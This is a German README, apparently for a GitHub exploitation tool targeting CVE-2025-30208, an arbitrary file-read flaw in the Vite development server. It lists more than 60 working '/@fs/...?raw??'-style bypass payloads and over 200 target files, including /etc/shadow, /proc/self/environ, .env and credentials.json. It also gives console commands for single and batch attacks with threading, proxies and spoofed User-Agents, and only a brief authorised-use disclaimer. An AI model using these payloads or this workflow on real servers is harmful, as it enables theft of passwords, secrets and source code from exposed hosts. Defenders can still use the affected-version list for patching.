
CVE‑2025‑30208 ist eine mittelschwere Schwachstelle zum beliebigen Auslesen von Dateien im Vite-Entwicklungsserver (einem beliebten Frontend-Build-Tool)
Erweiterter Schwachstellenscanner für CVE-2025-30208 mit Unternehmensfunktionen
Professionelles Penetrationstest-Tool zur Erkennung der Vite-Schwachstelle für beliebiges Dateilesen
🚀 Schnellstart • 📋 Funktionen • 🔧 Nutzung • 📊 Beispiele • 🛡️ Sicherheit
Dies ist ein umfassender Schwachstellenscanner, der entwickelt wurde, um die CVE-2025-30208-Schwachstelle in Vite-Entwicklungsservern zu erkennen und auszunutzen. Die Schwachstelle ermöglicht beliebiges Dateilesen über die Dateisystem-Endpunkte von Vite und kann sensible Konfigurationsdateien, Quellcode und Systeminformationen preisgeben.
Das Tool verfügt jetzt über eine modulare Architektur für bessere Wartbarkeit und Erweiterbarkeit:
CVE-2025-30208.py - Hauptscanner-Anwendungpayloads.py - Erweiterte Exploitation-Payloads (60+ Variationen)sensitive_files.py - Umfassende Datenbank sensibler Dateien (200+)html_template.py - Verbesserte Hacker-ähnliche HTML-Berichtsvorlagepip3 install -r requirements.txt
python3 CVE-2025-30208.py
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > set FILEPATH etc/passwd
CVE-2025-30208 > test
CVE-2025-30208 > run
# Ausführlichen Modus für detaillierte Ausgabe aktivieren
CVE-2025-30208 > verbose
CVE-2025-30208 > run
CVE-2025-30208 > set THREADS 10
CVE-2025-30208 > batch
192.168.1.100:3000
192.168.1.101:3000
192.168.1.102:3000
[Drücken Sie zweimal die Eingabetaste zum Beenden]
CVE-2025-30208 > scan
# Proxy konfigurieren
CVE-2025-30208 > proxy
Geben Sie Proxy ein: http://127.0.0.1:8080
# Benutzerdefinierte Header setzen
CVE-2025-30208 > headers
Geben Sie Header ein: {"User-Agent": "Custom Scanner"}
# Ratenbegrenzung konfigurieren
CVE-2025-30208 > rate
Geben Sie Ratenlimit ein: 1.0
# Schönen HTML-Bericht generieren
CVE-2025-30208 > pull
# Webserver zum Anzeigen des Berichts starten
CVE-2025-30208 > web
# Webserver auf bestimmtem Port starten
CVE-2025-30208 > web 8081
# Webserver stoppen
CVE-2025-30208 > web off
Der Scanner verwendet jetzt 60+ verschiedene Payload-Variationen, organisiert in payloads.py:
/@fs/{file_path}?raw??
/@fs/{file_path}?raw&url
/@fs/{file_path}?import&raw??
/@fs/{file_path}?raw&import
/@fs/{file_path}?import&url
/@fs/{file_path}?raw&source
/@fs/{file_path}?raw&content
/@fs/{file_path}?raw&data
/@fs/{file_path}?raw&file
/@fs/{file_path}?raw&type=text
/@fs/{file_path}?raw&format=text
/@fs/{file_path}?raw&encoding=utf8
/@fs/{file_path}?raw&vite&dev
/@fs/{file_path}?raw&vite&hot
/@fs/{file_path}?raw&vite&hmr
/@fs/{file_path}?raw&development
/@fs/{file_path}?raw&debug
/@fs/{file_path}?raw&esm
/@fs/{file_path}?raw&cjs
/@fs/{file_path}?raw&umd
/@fs/{file_path}?raw&js
/@fs/{file_path}?raw&ts
/@fs/{file_path}?raw&json
/@fs/{file_path}?raw&css
/@fs/{file_path}?raw&html
/app/{file_path}?raw??
/App/{file_path}?raw??
Das Tool testet jetzt auf 200+ sensible Dateien, organisiert in sensitive_files.py:
/etc/passwd - Benutzerkontoinformationen/etc/shadow - Verschlüsselte Passwortdaten/etc/services - Netzwerkdienste/etc/hosts - Hostnamen-Zuordnungen/etc/fstab - Dateisystemtabelle/etc/ssh/sshd_config - SSH-Serverkonfiguration/etc/crontab - System-Cron-Jobs/etc/sudoers - Sudo-Konfiguration/proc/version - Kernel-Version/proc/cpuinfo - CPU-Informationen/proc/meminfo - Speicherinformationen/proc/self/environ - Prozessumgebung/proc/self/cmdline - Prozess-Befehlszeile/proc/net/tcp - TCP-Verbindungen/proc/net/udp - UDP-Verbindungen.env - Umgebungsvariablen.env.local - Lokale Umgebung.env.production - Produktionsumgebungconfig.json - Anwendungskonfigurationsettings.json - Anwendungseinstellungenapplication.properties - Spring-Konfigurationapplication.yml - YAML-Konfigurationdatabase.yml - Datenbankkonfigurationsecrets.json - Geheimnisverwaltungpackage.json - Node.js-Abhängigkeitenpackage-lock.json - Gesperrte Abhängigkeitenyarn.lock - Yarn-Sperrdateivite.config.js - Vite-Konfigurationvite.config.ts - TypeScript Vite-Konfigurationtsconfig.json - TypeScript-Konfigurationwebpack.config.js - Webpack-Konfigurationnext.config.js - Next.js-Konfigurationnuxt.config.js - Nuxt.js-Konfigurationangular.json - Angular-Konfigurationvue.config.js - Vue.js-Konfigurationrollup.config.js - Rollup-Konfigurationeslint.config.js - ESLint-Konfiguration.git/config - Git-Konfiguration.gitignore - Git-Ignorier-Regeln.gitattributes - Git-Attribute.gitmodules - Git-Submodule.git/HEAD - Aktueller Branch.git/logs/HEAD - Git-Protokolle.git/refs/heads/master - Master-Branch.git/refs/heads/main - Main-BranchREADME.md - ProjektdokumentationCHANGELOG.md - ÄnderungsprotokollLICENSE - LizenzinformationenCONTRIBUTING.md - BeitragsrichtlinienAUTHORS - AutoreninformationenTODO.md - AufgabenlisteROADMAP.md - EntwicklungsfahrplanDockerfile - Docker-Konfigurationdocker-compose.yml - Docker Composedocker-compose.override.yml - Überschreibungskonfiguration.dockerignore - Docker-Ignorier-Regelndocker-compose.prod.yml - Produktionskonfigurationdocker-compose.dev.yml - Entwicklungskonfigurationnginx.conf - Nginx-Konfigurationapache2.conf - Apache-Konfigurationhttpd.conf - HTTP-Daemon-Konfiguration.htaccess - Apache-Zugriffskontrolleweb.config - IIS-Konfigurationrobots.txt - Suchmaschinen-Direktivensitemap.xml - Seitenstrukturmanifest.json - Web-App-Manifestsw.js - Service Workerfirebase.json - Firebase-Konfigurationfirebase.rules - Firebase-Sicherheitsregelnboot.ini - Boot-Konfigurationautoexec.bat - Auto-Ausführungsskriptsystem.ini - Systemkonfigurationwin.ini - Windows-KonfigurationUsers - BenutzerverzeichnisseWindows - SystemdateienProgram Files - AnwendungsverzeichnisseSystem - SystemdateienLibrary - BibliotheksdateienApplications - Anwendungsdateienprivate/etc/hosts - Hosts-Dateiprivate/etc/passwd - Benutzerkontendatabase.db - SQLite-Datenbankdatabase.sqlite - SQLite-Datenbankdata.db - Daten-Datenbankdump.sql - Datenbank-Dumpschema.sql - Datenbankschemamigrations - Datenbank-Migrationenlogs - Protokollverzeichniserror.log - Fehlerprotokolleaccess.log - Zugriffsprotokolleapp.log - Anwendungsprotokolledebug.log - Debug-Protokollecombined.log - Kombinierte Protokollebackup - Sicherungsverzeichnisbackup.sql - Datenbanksicherungbackup.zip - Komprimierte Sicherungdump - Datendumpexport - Datenexportauth.json - Authentifizierungskonfigurationcredentials.json - Anmeldeinformationsspeicherkeys.json - Schlüsselverwaltungtokens.json - Tokenspeicherjwt.json - JWT-Konfigurationoauth.json - OAuth-Konfigurationapi.json - API-Konfigurationswagger.json - API-Dokumentationopenapi.json - OpenAPI-Spezifikationgraphql.json - GraphQL-Konfigurationschema.json - API-Schemacloudformation.yml - AWS CloudFormationserverless.yml - Serverless-Konfigurationterraform.tf - Terraform-Konfigurationkubernetes.yml - Kubernetes-Konfigurationk8s.yml - Kubernetes-Konfigurationanalytics.json - Analyse-Konfigurationmonitoring.json - Überwachungseinrichtungmetrics.json - Metrik-Konfigurationtelemetry.json - TelemetriedatenDas Tool generiert jetzt schöne Hacker-ähnliche HTML-Berichte mit:
6.2.0 ≤ Vite ≤ 6.2.2
6.1.0 ≤ Vite ≤ 6.1.1
6.0.0 ≤ Vite ≤ 6.0.11
5.0.0 ≤ Vite ≤ 5.4.14
Vite ≤ 4.5.9
Vite ≥ 6.2.3
6.1.2 ≤ Vite < 6.2.0
6.0.12 ≤ Vite < 6.1.0
5.4.15 ≤ Vite < 6.0.0
4.5.10 ≤ Vite < 5.0.0
CVE-2025-30208 > set THREADS 20
CVE-2025-30208 > set RATE_LIMIT 0.5
CVE-2025-30208 > set TIMEOUT 10
CVE-2025-30208 > verbose
CVE-2025-30208 > batch
CVE-2025-30208 > proxy
Geben Sie Proxy ein: http://127.0.0.1:8080
CVE-2025-30208 > headers
Geben Sie Header ein: {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"}
CVE-2025-30208 > set RATE_LIMIT 2.0
CVE-2025-30208 > run
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run
CVE-2025-30208 > pull
CVE-2025-30208 > web 8080
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > scan
CVE-2025-30208/
├── CVE-2025-30208.py # Hauptscanner-Anwendung
├── payloads.py # Erweiterte Exploitation-Payloads (60+)
├── sensitive_files.py # Datenbank sensibler Dateien (200+)
├── html_template.py # Verbesserte HTML-Berichtsvorlage
├── README.md # Diese Dokumentation
├── requirements.txt # Python-Abhängigkeiten
├── logs/ # Verzeichnis für Protokolldateien
├── data_leak.html # Generierte HTML-Berichte
├── data_leak.json # Generierte JSON-Berichte
└── session.json # Gespeicherte Sitzungskonfigurationen
Wir begrüßen Beiträge zur Verbesserung dieses Tools:
payloads.pysensitive_files.pyhtml_template.pyDieses Projekt ist lizenziert für Bildungszwecke und autorisierte Sicherheitstests.
⚠️ Rechtlicher Hinweis: Dieses Tool ist nur für autorisierte Sicherheitstests und Forschungszwecke bestimmt. Die Benutzer sind dafür verantwortlich, sicherzustellen, dass sie vor dem Testen von Systemen die entsprechende Autorisierung haben. Die Autoren übernehmen keine Verantwortung für Missbrauch dieses Tools.
⭐ Wenn Ihnen dieses Tool geholfen hat, geben Sie ihm bitte einen Stern! ⭐
Mit ❤️ erstellt für die Sicherheitscommunity
| Befehl | Beschreibung | Beispiel |
|---|
set <option> <value> | Konfigurationsoptionen setzen | set RHOST 192.168.1.100 |
show options | Aktuelle Einstellungen anzeigen | show options |
edit | Interaktiver Optionseditor | edit |
run / exploit | Schwachstellentest ausführen | run |
batch | Mehrere Ziele im Batch scannen | batch |
scan | Sensible Dateien erkennen | scan |
pull | Ergebnisse nach HTML/JSON exportieren | pull |
web [on|off|port] | Webserver für HTML-Berichte | web 8080 |
save | Sitzungskonfiguration speichern | save |
load | Sitzungskonfiguration laden | load |
test | Verbindung zum Ziel testen | test |
validate | Aktuelle Konfiguration validieren | validate |
verbose | Ausführlichen Modus umschalten | verbose |
proxy | Proxy-Einstellungen konfigurieren | proxy |
headers | Benutzerdefinierte HTTP-Header setzen | headers |
rate | Ratenbegrenzung konfigurieren | rate |
log | Protokollinformationen anzeigen | log |
help / ? | Hilfe anzeigen | help |
exit / quit | Tool beenden | exit |
| Option | Beschreibung | Standard | Validierung |
|---|
RHOST | Ziel-Host/IP-Adresse | - | Hostname/IP-Validierung |
RPORT | Ziel-Portnummer | - | Portbereich (1-65535) |
FILEPATH | Zu testender Dateipfad | etc/passwd | Pfadvalidierung |
PROXY | HTTP/HTTPS-Proxy-URL | - | URL-Format-Validierung |
VERBOSE | Ausführliche Ausgabe aktivieren | false | Boolesche Validierung |
RATE_LIMIT | Verzögerung zwischen Anfragen (Sekunden) | 0.3 | Numerische Validierung |
THREADS | Anzahl der Threads für Batch-Scans | 5 | Ganzzahl-Validierung |
TIMEOUT | Anfrage-Timeout (Sekunden) | 5 | Ganzzahl-Validierung |
CUSTOM_HEADERS | Benutzerdefinierte HTTP-Header (JSON) | {} | JSON-Format-Validierung |
prettier.config.js - Prettier-Konfigurationjest.config.js - Jest-Konfigurationbabel.config.js - Babel-Konfigurationtailwind.config.js - Tailwind CSS-Konfiguration| Datei | Beschreibung | Format |
|---|
data_leak.html | Verbesserter Hacker-ähnlicher HTML-Schwachstellenbericht | HTML |
data_leak.json | Strukturierter JSON-Export | JSON |
sensitive_files_discovery.json | Erkannte sensible Dateien | JSON |
session.json | Gespeicherte Sitzungskonfiguration | JSON |
logs/cve_2025_30208_YYYYMMDD_HHMMSS.log | Detaillierte Prüfprotokolle | Text |